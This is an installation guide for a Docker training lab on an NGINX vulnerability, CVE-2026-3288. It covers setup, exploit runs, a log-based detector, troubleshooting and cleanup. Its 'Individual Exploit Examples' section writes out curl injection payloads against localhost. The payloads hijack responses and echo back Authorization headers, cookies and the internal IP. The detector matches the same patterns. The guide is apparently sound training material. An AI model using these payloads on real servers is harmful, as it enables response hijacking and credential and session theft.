# CVE-2026-3288 Lab - Installation Guide
## Quick Installation
### Prerequisites Check
```bash
# Check Docker
docker --version
# Required: Docker 20.10+
# Check Docker Compose
docker-compose --version
# Required: Docker Compose 1.29+
# Check Python
python3 --version
# Required: Python 3.6+
# Check curl
curl --version
```
### Step-by-Step Installation
#### 1. Navigate to Lab Directory
```bash
cd CVE-2026-3288-lab
```
#### 2. Make Scripts Executable
```bash
chmod +x exploits/*.sh
chmod +x exploits/*.py
chmod +x detection/*.sh
chmod +x cleanup/*.sh
```
#### 3. Start the Lab
```bash
# Start all containers
docker-compose up -d
# Check status
docker-compose ps
```
Expected output:
```
NAME STATUS
cve-2026-3288-backend Up
cve-2026-3288-nginx Up
cve-2026-3288-monitor Up
```
#### 4. Verify Installation
```bash
# Test backend
curl http://localhost:8080/
# Test NGINX
curl http://localhost/
# Test health endpoint
curl http://localhost/health
```
#### 5. View Logs
```bash
# All logs
docker-compose logs
# NGINX logs only
docker-compose logs nginx
# Follow logs
docker-compose logs -f
```
## Running Exploits
### Automated Exploitation
```bash
cd exploits
# Install Python requirements
pip3 install requests
# Run all exploits
python3 exploit.py --all
# Run specific exploit
python3 exploit.py --hijack
python3 exploit.py --creds
python3 exploit.py --redirect
```
### Manual Exploitation
```bash
cd exploits
# Make executable
chmod +x test-exploits.sh
# Run manual tests
bash test-exploits.sh
```
### Individual Exploit Examples
```bash
# Response hijacking
curl 'http://localhost/api" return 200 "HACKED'
# Credential theft
curl -H "Authorization: Bearer secret" \
'http://localhost/login" return 200 "Token: $http_authorization'
# Cookie theft
curl -H "Cookie: session=abc123" \
'http://localhost/" return 200 "Cookies: $http_cookie'
# Internal IP leak
curl 'http://localhost/" return 200 "IP: $server_addr'
```
## Monitoring and Detection
### Start Log Monitoring
```bash
cd detection
# Make executable
chmod +x monitor-logs.sh
# Start monitoring
bash monitor-logs.sh
```
### Manual Log Inspection
```bash
# View access logs
docker-compose logs nginx | grep -E 'return|rewrite'
# View error logs (NGINX writes the level in lowercase, e.g. [error])
docker-compose logs nginx | grep -i error
# Export logs
docker-compose logs nginx > nginx-logs.txt
```
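The `grep -E 'return|rewrite'` filter above also matches harmless paths such as `/docs/return-policy`. The following is an added example, not one of the lab's own scripts. It assumes the NGINX `combined` log format and default log escaping, where a `"` in the request is written as `\x22`. It flags only requests where a quote is followed by a directive, or where a variable from the payloads above appears. The function names and sample lines are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not part of the lab): flag access-log lines whose request
# target carries an NGINX directive or variable after a double quote.

# Constructed sample lines in NGINX "combined" format, not real lab output.
sample_log() {
  cat <<'EOF'
172.18.0.1 - - [01/Jan/2026:10:00:00 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/8.5.0"
172.18.0.1 - - [01/Jan/2026:10:00:05 +0000] "GET /api\x22 return 200 \x22HACKED HTTP/1.1" 200 6 "-" "curl/8.5.0"
172.18.0.1 - - [01/Jan/2026:10:00:09 +0000] "GET /login%22%20return%20200%20%22Token:%20$http_authorization HTTP/1.1" 200 20 "-" "curl/8.5.0"
172.18.0.1 - - [01/Jan/2026:10:00:12 +0000] "GET /docs/return-policy HTTP/1.1" 200 512 "-" "curl/8.5.0"
172.18.0.1 - - [01/Jan/2026:10:00:15 +0000] "GET /search?q=rewrite+rules HTTP/1.1" 200 128 "-" "curl/8.5.0"
EOF
}

# Reads log lines on stdin, prints "<line number>: <request>" for each hit.
flag_injection() {
  awk -F'"' '{
    req = tolower($2)                 # first quoted field = request line
    gsub(/\\x22|%22/, "\"", req)      # NGINX log escape / URL-encoded quote
    gsub(/%20|[+]/, " ", req)         # URL-encoded space
    gsub(/%24/, "$", req)             # URL-encoded dollar sign
    if (req ~ /" *(return|rewrite) / ||
        req ~ /[$](http_[a-z0-9_]+|server_addr)/)
      print NR ": " $2
  }'
}

sample_log | flag_injection
```

Against the running lab, pipe the container output through the same function: `docker-compose logs nginx | flag_injection`.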
## Troubleshooting
### Port Already in Use
```bash
# Check what's using port 80
sudo lsof -i :80
# Option 1: Stop conflicting service
sudo systemctl stop apache2 # or nginx
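# Option 2: Change port in docker-compose.yml
# Edit ports section: "8080:80" instead of "80:80"
# Note: step 4 reaches the backend on host port 8080; if that mapping is
# in place, pick another free host port for NGINX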
```
### Containers Won't Start
```bash
# Check Docker daemon
sudo systemctl status docker
# View detailed logs
docker-compose logs
# Rebuild containers
docker-compose down
docker-compose build --no-cache
docker-compose up -d
```
### NGINX Configuration Errors
```bash
# Test NGINX config
docker exec cve-2026-3288-nginx nginx -t
# View config
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf
# Restart NGINX
docker-compose restart nginx
```
### Backend Not Responding
```bash
# Check backend logs
docker-compose logs backend
# Test backend directly
docker exec cve-2026-3288-backend curl http://localhost:5000/
# Restart backend
docker-compose restart backend
```
### Python Script Errors
```bash
# Install missing dependencies
pip3 install requests
# Run with verbose output
python3 exploit.py --all -v
# Check Python version
python3 --version # Should be 3.6+
```
## Cleanup
### Stop Lab
```bash
# Stop containers
docker-compose stop
# Stop and remove containers
docker-compose down
# Remove containers and volumes
docker-compose down -v
```
### Complete Cleanup
```bash
cd cleanup
# Make executable
chmod +x cleanup.sh
# Run cleanup script
bash cleanup.sh
```
### Manual Cleanup
```bash
# Remove containers
docker-compose down -v
# Remove images
docker rmi cve-2026-3288-lab_nginx
docker rmi cve-2026-3288-lab_backend
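# Remove volumes (prunes ALL unused volumes on this host, not only the lab's)
docker volume prune
# Remove networks (prunes ALL unused networks on this host, not only the lab's)
docker network prune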
```
## Verification Checklist
- [ ] Docker and Docker Compose installed
- [ ] Lab containers running (`docker-compose ps`)
- [ ] NGINX responding on port 80
- [ ] Backend responding on port 8080
- [ ] Exploit scripts executable
- [ ] Python requests library installed
- [ ] Can run automated exploits
- [ ] Can run manual exploits
- [ ] Log monitoring working
## Next Steps
After successful installation:
1. Read the main [README.md](README.md) for vulnerability details
2. Review [payloads.txt](exploits/payloads.txt) for exploit examples
3. Run automated exploits: `python3 exploits/exploit.py --all`
4. Try manual exploitation: `bash exploits/test-exploits.sh`
5. Monitor logs: `bash detection/monitor-logs.sh`
## Support
If you encounter issues:
1. Check the Troubleshooting section above
2. Review Docker logs: `docker-compose logs`
3. Verify prerequisites are met
4. Ensure no port conflicts
5. Try rebuilding: `docker-compose build --no-cache`
---
**For authorized security training only**